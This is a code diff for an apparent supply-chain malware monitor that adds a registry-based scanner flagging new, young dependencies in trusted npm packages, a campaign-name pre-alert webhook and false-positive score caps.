  poll,
1185
1127
 
1128
+ // Active-campaign name watch (did-NNNN, etc.)
1129
+ CAMPAIGN_PATTERNS,
1130
+ matchCampaignPattern,
1131
+
1186
1132
  // Test seam — see _deps definition near the top of this file.
1187
1133
  _deps
1188
1134
  };
@@ -56,8 +56,6 @@ const {
56
56
  formatFindings,
57
57
  evaluateCacheTrigger,
58
58
  isFirstPublishHighRisk,
59
- POPULAR_THRESHOLD,
60
- downloadsCache: classifyDownloadsCache,
61
59
  DOWNLOADS_CACHE_TTL,
62
60
  HIGH_CONFIDENCE_MALICE_TYPES,
63
61
  IOC_MATCH_TYPES,
@@ -98,8 +96,8 @@ const {
98
96
  isSafeLifecycleScript
99
97
  } = require('./temporal.js');
100
98
 
101
- // From ./ingestion.js (will be created — currently in monitor.js)
102
- const { getNpmLatestTarball, getPyPITarballUrl, getWeeklyDownloads, checkTrustedDepDiff } = require('./ingestion.js');
99
+ // From ./ingestion.js
100
+ const { getNpmLatestTarball, getPyPITarballUrl } = require('./ingestion.js');
103
101
 
104
102
  // From ./tarball-archive.js
105
103
  const { archiveSuspectTarball } = require('./tarball-archive.js');
@@ -226,12 +224,15 @@ function countPackageFiles(dir) {
226
224
  *
227
225
  * @param {string} extractedDir - Path to extracted package
228
226
  * @param {number} timeoutMs - Timeout in milliseconds
227
+ * @param {object} [scanContext] - Monitor-side context spread into pipeline options.
228
+ * Required by opt-in scanners (e.g. trusted-dep-diff) that need name/version/ecosystem
229
+ * and a monitorMode flag to perform registry queries.
229
230
  * @returns {Promise<object>} Scan result (same shape as run(_, {_capture:true}))
230
231
  */
231
- function runScanInWorker(extractedDir, timeoutMs) {
232
+ function runScanInWorker(extractedDir, timeoutMs, scanContext = null) {
232
233
  return new Promise((resolve, reject) => {
233
234
  const worker = new Worker(SCAN_WORKER_PATH, {
234
- workerData: { extractedDir }
235
+ workerData: { extractedDir, scanContext: scanContext || {} }
235
236
  });
236
237
 
237
238
  let settled = false;
@@ -418,7 +419,19 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
418
419
 
419
420
  let result;
420
421
  try {
421
- result = await runScanInWorker(extractedDir, STATIC_SCAN_TIMEOUT_MS);
422
+ // scanContext: feeds monitor-side info (name/version/ecosystem) and the
423
+ // monitorMode + trustedDepDiff flags into opt-in pipeline scanners.
424
+ // The trusted-dep-diff scanner needs both name and version to query the
425
+ // registry for the previous-version dependency list — that information
426
+ // is meaningless in offline CLI mode but available here.
427
+ const scanContext = {
428
+ name,
429
+ version,
430
+ ecosystem,
431
+ monitorMode: true,
432
+ trustedDepDiff: true
433
+ };
434
+ result = await runScanInWorker(extractedDir, STATIC_SCAN_TIMEOUT_MS, scanContext);
422
435
  } catch (staticErr) {
423
436
  if (/static scan timeout/i.test(staticErr.message)) {
424
437
  console.error(`[MONITOR] STATIC_TIMEOUT: ${name}@${version} — exceeded ${STATIC_SCAN_TIMEOUT_MS / 1000}s (worker terminated)`);
@@ -542,40 +555,20 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
542
555
  recordTrainingSample(result, { name, version, ecosystem, label: 'clean', registryMeta: meta, unpackedSize: meta.unpackedSize, npmRegistryMeta, fileCountTotal, hasTests });
543
556
  return { sandboxResult: null, staticClean: true };
544
557
  } else {
545
- // Popularity pre-filter: skip sandbox for popular npm packages with only MEDIUM/LOW
546
- if (ecosystem === 'npm' && !hasIOCMatch(result) && !hasTyposquat(result) && !hasHighOrCritical(result)) {
547
- const downloads = await getWeeklyDownloads(name);
548
- if (downloads >= POPULAR_THRESHOLD) {
549
- // Dependency diff check: detect supply-chain injection on TRUSTED packages
550
- // (e.g., axios 1.14.0 1.14.1 adding unknown plain-crypto-js, 2026-03-30)
551
- const trustedFindings = await checkTrustedDepDiff(name, version);
552
- const hasCriticalDepFinding = trustedFindings.some(f => f.severity === 'CRITICAL');
553
-
554
- if (hasCriticalDepFinding) {
555
- // CRITICAL: unknown/new dependency — bypass TRUSTED, route to full scan + sandbox
556
- console.log(`[MONITOR] TRUSTED BYPASS: ${name}@${version} new unknown dependency detected, routing to full scan`);
557
- result.threats.push(...trustedFindings);
558
- for (const f of trustedFindings) {
559
- if (f.severity === 'CRITICAL') result.summary.critical = (result.summary.critical || 0) + 1;
560
- else if (f.severity === 'HIGH') result.summary.high = (result.summary.high || 0) + 1;
561
- }
562
- // Fall through to full classification below (do NOT return)
563
- } else {
564
- // No CRITICAL dep findings — normal TRUSTED skip (log HIGH findings if any)
565
- for (const f of trustedFindings) {
566
- console.log(`[MONITOR] TRUSTED dep change: ${f.message}`);
567
- }
568
- stats.scanned++;
569
- const elapsed = Date.now() - startTime;
570
- stats.totalTimeMs += elapsed;
571
- stats.clean++;
572
- console.log(`[MONITOR] TRUSTED (popular): ${name}@${version} (${Math.round(downloads / 1000)}k downloads/week, ${counts.join(', ')})`);
573
- updateScanStats('clean');
574
- recordTrainingSample(result, { name, version, ecosystem, label: 'clean', registryMeta: meta, unpackedSize: meta.unpackedSize, npmRegistryMeta, fileCountTotal, hasTests });
575
- return { sandboxResult: null, staticClean: true };
576
- }
577
- }
578
- }
558
+ // No popularity-based skip here. The TRUSTED (popular) shortcut that used
559
+ // to live at this point was a whitelist-by-downloads CLAUDE.md forbids
560
+ // FP-reducing whitelists, and the Shai-Hulud wave-2 ATO attacks of May 2026
561
+ // proved that popular packages are precisely the prime target for ATO.
562
+ // Downstream attenuation handles the FP load via computeReputationFactor()
563
+ // and the graduated webhook threshold (webhook.js:83-87) popular packages
564
+ // need a higher static score to fire a webhook, but they remain visible in
565
+ // the pipeline (sandbox, persisted detections, training samples) the same
566
+ // way every other package is. The supply-chain dep-diff check that the
567
+ // old block used as bypass logic now runs as a first-class scanner
568
+ // (src/scanner/trusted-dep-diff.js, wired in via executor.js); its findings
569
+ // arrive in result.threats before this point, so isSuspectClassification
570
+ // and the reputation bypass for HIGH_CONFIDENCE_MALICE_TYPES take the
571
+ // package straight to tier 1a + mandatory sandbox + webhook.
579
572
 
580
573
  const classification = isSuspectClassification(result);
581
574
  if (!classification.suspect) {
@@ -187,6 +187,41 @@ async function sendIOCPreAlert(name, version) {
187
187
  await sendWebhook(url, payload, { rawPayload: true });
188
188
  }
189
189
 
190
+ /**
191
+ * Layer 1b: Send immediate pre-alert webhook when a package name matches an
192
+ * active-campaign pattern (e.g. `did-NNNN` in May 2026). Fires BEFORE tarball
193
+ * download \u2014 IOC lists are eventually-consistent and lag the campaign by
194
+ * hours to days, so name-pattern watch is the only signal available in real
195
+ * time while the campaign is in flight.
196
+ * @param {string} name - Package name that matched the campaign pattern
197
+ * @param {string} campaign - Short campaign label (e.g. 'did-NNNN')
198
+ */
199
+ async function sendCampaignPreAlert(name, campaign) {
200
+ const url = getWebhookUrl();
201
+ if (!url) return;
202
+
203
+ const npmLink = `https://www.npmjs.com/package/${encodeURIComponent(name)}`;
204
+
205
+ const payload = {
206
+ embeds: [{
207
+ title: '\u26a0\ufe0f CAMPAIGN PRE-ALERT \u2014 Suspected Active Campaign',
208
+ color: 0xe67e22,
209
+ fields: [
210
+ { name: 'Package', value: `[${name}](${npmLink})`, inline: true },
211
+ { name: 'Source', value: `Name pattern: ${campaign}`, inline: true },
212
+ { name: 'Detection', value: 'Changes stream pre-scan', inline: true },
213
+ { name: 'Status', value: 'Suspected campaign publication \u2014 not yet confirmed malicious. Full scan queued; treat as suspect until verdict lands.', inline: false }
214
+ ],
215
+ footer: {
216
+ text: `MUAD'DIB Campaign Pre-Alert | ${new Date().toISOString().replace('T', ' ').replace(/\.\d+Z$/, ' UTC')}`
217
+ },
218
+ timestamp: new Date().toISOString()
219
+ }]
220
+ };
221
+
222
+ await sendWebhook(url, payload, { rawPayload: true });
223
+ }
224
+
190
225
  /**
191
226
  * Check if a specific package@version matches a versioned IOC entry.
192
227
  * Returns the matching IOC entry or null.
@@ -1172,6 +1207,7 @@ module.exports = {
1172
1207
  shouldSendWebhook,
1173
1208
  buildMonitorWebhookPayload,
1174
1209
  sendIOCPreAlert,
1210
+ sendCampaignPreAlert,
1175
1211
  matchVersionedIOC,
1176
1212
  computeRiskLevel,
1177
1213
  computeRiskScore,
@@ -10,6 +10,7 @@ const { scanIocStrings } = require('../scanner/ioc-strings.js');
10
10
  const { scanAntiForensic } = require('../scanner/anti-forensic.js');
11
11
  const { scanStubPackage } = require('../scanner/stub-package.js');
12
12
  const { scanMonorepo } = require('../scanner/monorepo.js');
13
+ const { scanTrustedDepDiff } = require('../scanner/trusted-dep-diff.js');
13
14
  const { analyzeDataFlow } = require('../scanner/dataflow.js');
14
15
  const { scanTyposquatting, findPyPITyposquatMatch } = require('../scanner/typosquat.js');
15
16
  const { scanGitHubActions } = require('../scanner/github-actions.js');
@@ -201,7 +202,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
201
202
  'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
202
203
  'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
203
204
  'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
204
- 'scanStubPackage', 'scanMonorepo'
205
+ 'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
205
206
  ];
206
207
 
207
208
  const settledResults = await Promise.allSettled([
@@ -221,7 +222,13 @@ async function execute(targetPath, options, pythonDeps, warnings) {
221
222
  yieldThen(() => scanIocStrings(targetPath)),
222
223
  withTimeout(() => scanAntiForensic(targetPath), 'scanAntiForensic'),
223
224
  yieldThen(() => scanStubPackage(targetPath)),
224
- yieldThen(() => scanMonorepo(targetPath))
225
+ yieldThen(() => scanMonorepo(targetPath)),
226
+ // Opt-in scanner — short-circuits to [] unless options.trustedDepDiff or
227
+ // options.monitorMode is set. CLI runs without flags pay no cost (no I/O).
228
+ // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
229
+ // internal timeouts, but a registry slowdown with many added deps could exceed
230
+ // the static-scan budget without this cap.
231
+ withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
225
232
  ]);
226
233
 
227
234
  // Extract results: use empty array for rejected scanners, log errors
@@ -250,7 +257,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
250
257
  iocStringThreats,
251
258
  antiForensicThreats,
252
259
  stubPackageThreats,
253
- monorepoThreats
260
+ monorepoThreats,
261
+ trustedDepDiffThreats
254
262
  ] = scanResult;
255
263
 
256
264
  // Emit warning if file count cap was hit + quick-scan overflow files
@@ -330,6 +338,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
330
338
  ...antiForensicThreats,
331
339
  ...stubPackageThreats,
332
340
  ...monorepoThreats,
341
+ ...trustedDepDiffThreats,
333
342
  ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
334
343
  type: f.type,
335
344
  severity: f.severity,
@@ -23,7 +23,12 @@ const { run } = require('../index.js');
23
23
 
24
24
  (async () => {
25
25
  try {
26
- const result = await run(workerData.extractedDir, { _capture: true });
26
+ // scanContext (optional) carries monitor-side info that opt-in scanners need
27
+ // (e.g. trusted-dep-diff requires package name + version to query the registry).
28
+ // It is spread INTO the pipeline options, but `_capture: true` always wins so
29
+ // the worker keeps returning the result object — never prints.
30
+ const scanContext = workerData.scanContext || {};
31
+ const result = await run(workerData.extractedDir, { ...scanContext, _capture: true });
27
32
  parentPort.postMessage({ type: 'result', data: result });
28
33
  } catch (err) {
29
34
  parentPort.postMessage({ type: 'error', message: err.message || String(err) });
@@ -0,0 +1,205 @@
1
+ 'use strict';
2
+
3
+ /**
4
+ * Trusted dep-diff scanner — detects supply-chain injection via NEW dependencies
5
+ * added between two adjacent published versions of an npm package.
6
+ *
7
+ * Threat model: a compromised maintainer account publishes a patch bump that
8
+ * silently introduces a fresh (or unknown-aged) dependency carrying the actual
9
+ * payload. Reference incident: axios 1.14.0 → 1.14.1 adding `plain-crypto-js`
10
+ * on 2026-03-30. The hostile dep is short-aged and unrecognised, but the host
11
+ * package itself is reputable, so popularity-based filters miss it.
12
+ *
13
+ * Opt-in by design: the scanner needs registry I/O for the previous version's
14
+ * dependency list, which is meaningless for offline CLI audits of a frozen
15
+ * node_modules. It only runs when explicitly enabled via
16
+ * options.trustedDepDiff === true OR
17
+ * options.monitorMode === true
18
+ * The monitor pipeline sets both via the worker thread context.
19
+ *
20
+ * Findings emitted (rule IDs already registered in src/rules/index.js:2598-2621):
21
+ * - trusted_new_unknown_dependency (CRITICAL) — added dep < 7d old OR age unknown
22
+ * - trusted_new_dependency (HIGH) — added dep ≥ 7d old
23
+ *
24
+ * Both types are in HIGH_CONFIDENCE_MALICE_TYPES (classify.js:60), which means
25
+ * downstream reputation attenuation is bypassed — the finding's severity reaches
26
+ * the webhook decision uncapped.
27
+ */
28
+
29
+ const fs = require('fs');
30
+ const path = require('path');
31
+ const https = require('https');
32
+
33
+ const TRUSTED_DEP_AGE_THRESHOLD_MS = 7 * 24 * 60 * 60 * 1000; // 7 days
34
+
35
+ const PACKUMENT_TIMEOUT_MS = 10_000;
36
+ const DEP_AGE_TIMEOUT_MS = 5_000;
37
+
38
+ /**
39
+ * Minimal HTTPS GET with follow-redirects and timeout.
40
+ * Local copy (not shared with monitor/ingestion.js) to keep the scanner
41
+ * self-contained — the monitor module pulls this scanner, not the reverse.
42
+ */
43
+ function httpsGet(url, timeoutMs = 30_000) {
44
+ return new Promise((resolve, reject) => {
45
+ const req = https.get(url, { timeout: timeoutMs }, (res) => {
46
+ if (res.statusCode === 301 || res.statusCode === 302) {
47
+ res.resume();
48
+ const location = res.headers.location;
49
+ if (!location) return reject(new Error(`Redirect without Location for ${url}`));
50
+ return httpsGet(location, timeoutMs).then(resolve, reject);
51
+ }
52
+ if (res.statusCode < 200 || res.statusCode >= 300) {
53
+ res.resume();
54
+ return reject(new Error(`HTTP ${res.statusCode} for ${url}`));
55
+ }
56
+ const chunks = [];
57
+ res.on('data', (chunk) => chunks.push(chunk));
58
+ res.on('end', () => resolve(Buffer.concat(chunks).toString('utf8')));
59
+ res.on('error', reject);
60
+ });
61
+ req.on('error', reject);
62
+ req.on('timeout', () => {
63
+ req.destroy();
64
+ reject(new Error(`Timeout for ${url}`));
65
+ });
66
+ });
67
+ }
68
+
69
+ /**
70
+ * Core dep-diff logic — extracted verbatim from monitor/ingestion.js#checkTrustedDepDiff
71
+ * with no behavioural change: same findings shape, same rule_ids, same severity
72
+ * mapping, same 7-day age cutoff. Tests covering the original implementation
73
+ * (tests/integration/monitor.test.js:8929-9067) cover this directly via the
74
+ * `checkTrustedDepDiff` alias export below.
75
+ *
76
+ * @param {string} name - Package name
77
+ * @param {string} newVersion - Newly published version
78
+ * @returns {Promise<Array>} findings (empty on error or no new deps)
79
+ */
80
+ async function checkDepDiff(name, newVersion) {
81
+ const findings = [];
82
+ try {
83
+ const body = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(name)}`, PACKUMENT_TIMEOUT_MS);
84
+ const packument = JSON.parse(body);
85
+
86
+ if (!packument.versions || !packument.time) return findings;
87
+
88
+ // Sort versions by publish time (not semver — handles prereleases correctly)
89
+ const timeMap = packument.time;
90
+ const versionKeys = Object.keys(packument.versions)
91
+ .filter(v => timeMap[v])
92
+ .sort((a, b) => new Date(timeMap[a]) - new Date(timeMap[b]));
93
+
94
+ const newIdx = versionKeys.indexOf(newVersion);
95
+ if (newIdx <= 0) return findings; // First version or not found
96
+
97
+ const prevVersion = versionKeys[newIdx - 1];
98
+
99
+ const prevDeps = (packument.versions[prevVersion] && packument.versions[prevVersion].dependencies) || {};
100
+ const newDeps = (packument.versions[newVersion] && packument.versions[newVersion].dependencies) || {};
101
+
102
+ const addedDeps = Object.keys(newDeps).filter(dep => !(dep in prevDeps));
103
+ if (addedDeps.length === 0) return findings;
104
+
105
+ console.log(`[SCANNER] trusted-dep-diff: ${name} ${prevVersion} → ${newVersion}: +${addedDeps.length} new dep(s): ${addedDeps.join(', ')}`);
106
+
107
+ for (const dep of addedDeps) {
108
+ let ageMs = null;
109
+ try {
110
+ const depBody = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(dep)}`, DEP_AGE_TIMEOUT_MS);
111
+ const depData = JSON.parse(depBody);
112
+ const created = depData.time && depData.time.created;
113
+ if (created) {
114
+ ageMs = Date.now() - new Date(created).getTime();
115
+ }
116
+ } catch (err) {
117
+ console.log(`[SCANNER] trusted-dep-diff: could not check age of dependency ${dep}: ${err.message}`);
118
+ }
119
+
120
+ if (ageMs === null || ageMs < TRUSTED_DEP_AGE_THRESHOLD_MS) {
121
+ const ageDays = ageMs !== null ? Math.floor(ageMs / 86400000) : 'unknown';
122
+ findings.push({
123
+ type: 'trusted_new_unknown_dependency',
124
+ severity: 'CRITICAL',
125
+ confidence: ageMs === null ? 'medium' : 'high',
126
+ file: 'package.json',
127
+ message: `TRUSTED package ${name} added unknown dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
128
+ rule_id: 'MUADDIB-TRUSTED-001',
129
+ mitre: 'T1195.002',
130
+ dep,
131
+ depAgeDays: ageDays,
132
+ prevVersion,
133
+ newVersion
134
+ });
135
+ } else {
136
+ const ageDays = Math.floor(ageMs / 86400000);
137
+ findings.push({
138
+ type: 'trusted_new_dependency',
139
+ severity: 'HIGH',
140
+ confidence: 'medium',
141
+ file: 'package.json',
142
+ message: `TRUSTED package ${name} added new dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
143
+ rule_id: 'MUADDIB-TRUSTED-002',
144
+ mitre: 'T1195.002',
145
+ dep,
146
+ depAgeDays: ageDays,
147
+ prevVersion,
148
+ newVersion
149
+ });
150
+ }
151
+ }
152
+
153
+ return findings;
154
+ } catch (err) {
155
+ console.log(`[SCANNER] trusted-dep-diff: check failed for ${name}@${newVersion}: ${err.message}`);
156
+ return findings;
157
+ }
158
+ }
159
+
160
+ /**
161
+ * Pipeline entry point. Called by src/pipeline/executor.js alongside the other
162
+ * 17 scanners (Promise.allSettled). Gated by an explicit opt-in option to keep
163
+ * CLI audits offline-safe.
164
+ *
165
+ * @param {string} targetPath - Extracted package directory
166
+ * @param {object} options - Pipeline options. Honors:
167
+ * - options.trustedDepDiff - explicit opt-in (preferred)
168
+ * - options.monitorMode - opt-in for the monitor daemon path
169
+ * - options.name - package name override (avoids re-reading package.json)
170
+ * - options.version - version override
171
+ * - options.ecosystem - 'npm' | 'pypi' | ... — scanner is npm-only
172
+ * @returns {Promise<Array>} findings array (always — never rejects)
173
+ */
174
+ async function scanTrustedDepDiff(targetPath, options = {}) {
175
+ if (!options.trustedDepDiff && !options.monitorMode) return [];
176
+ if (options.ecosystem && options.ecosystem !== 'npm') return [];
177
+
178
+ let name = options.name || null;
179
+ let version = options.version || null;
180
+
181
+ if (!name || !version) {
182
+ const pkgJsonPath = path.join(targetPath, 'package.json');
183
+ if (!fs.existsSync(pkgJsonPath)) return [];
184
+ let pkg;
185
+ try {
186
+ pkg = JSON.parse(fs.readFileSync(pkgJsonPath, 'utf8'));
187
+ } catch {
188
+ return [];
189
+ }
190
+ name = name || pkg.name;
191
+ version = version || pkg.version;
192
+ }
193
+
194
+ if (!name || !version) return [];
195
+
196
+ return await checkDepDiff(name, version);
197
+ }
198
+
199
+ module.exports = {
200
+ scanTrustedDepDiff,
201
+ checkDepDiff,
202
+ // Backwards-compat alias for existing tests imported from monitor/ingestion.js
203
+ checkTrustedDepDiff: checkDepDiff,
204
+ TRUSTED_DEP_AGE_THRESHOLD_MS
205
+ };
package/src/scoring.js CHANGED
@@ -1485,6 +1485,9 @@ const {
1485
1485
  placeholderAntiDepConfusion,
1486
1486
  mcpServerEnvAccess,
1487
1487
  vendorCliSdk,
1488
+ aiAgentBot,
1489
+ vendorMinifiedBundle,
1490
+ typosquatBenignLifecycle,
1488
1491
  } = require('./ml/feature-extractor.js');
1489
1492
 
1490
1493
  /**
@@ -1519,6 +1522,13 @@ function applyContextualFPCaps(result, pkgMeta) {
1519
1522
  if (bundleWithoutInstallScripts(result, meta)) {
1520
1523
  applied.push({ feature: 'bundle_without_install_scripts', cap: 30 });
1521
1524
  }
1525
+ // F12: vendor minified bundle cascade (>=3 CASCADE_TYPES on a single
1526
+ // bundle file, no lifecycle, no veto) → MAX 25. Targets the v2.11.27
1527
+ // weekly review cluster (@photoroom/ui, @vkontakte/videoplayer-shared).
1528
+ // Tighter than F1 because the cascade is a stronger structural signature.
1529
+ if (vendorMinifiedBundle(result, meta)) {
1530
+ applied.push({ feature: 'vendor_minified_bundle', cap: 25 });
1531
+ }
1522
1532
  // F3: credential destination first-party API → MAX 30
1523
1533
  if (networkDestinationFirstParty(result, meta)) {
1524
1534
  applied.push({ feature: 'network_destination_first_party', cap: 30 });
@@ -1543,10 +1553,22 @@ function applyContextualFPCaps(result, pkgMeta) {
1543
1553
  if (vendorCliSdk(result, meta)) {
1544
1554
  applied.push({ feature: 'vendor_cli_sdk', cap: 35 });
1545
1555
  }
1556
+ // F11: legit AI agent / bot / multi-LLM orchestrator → MAX 35
1557
+ if (aiAgentBot(result, meta)) {
1558
+ applied.push({ feature: 'ai_agent_bot', cap: 35 });
1559
+ }
1546
1560
  // F5: typosquat on scoped package → suppress typosquat points
1547
1561
  if (typosquatScopedPackage(result, meta)) {
1548
1562
  applied.push({ feature: 'typosquat_scoped_package', cap: -1 });
1549
1563
  }
1564
+ // F13: boundary-squat dep + provably benign lifecycle (husky install,
1565
+ // npm run build, patches/apply-patches) → MAX 30. Targets the v2.11.28
1566
+ // weekly review cluster (@doyourjob/gravity-ui-page-constructor,
1567
+ // magmastream, balena-cli, @1d1s/design-system, etc.). Vetoes on any
1568
+ // exfil signal, IOC hit, or Axios UNC1069 dep-usage compound.
1569
+ if (typosquatBenignLifecycle(result, meta)) {
1570
+ applied.push({ feature: 'typosquat_benign_lifecycle', cap: 30 });
1571
+ }
1550
1572
 
1551
1573
  if (applied.length === 0) return applied;
1552
1574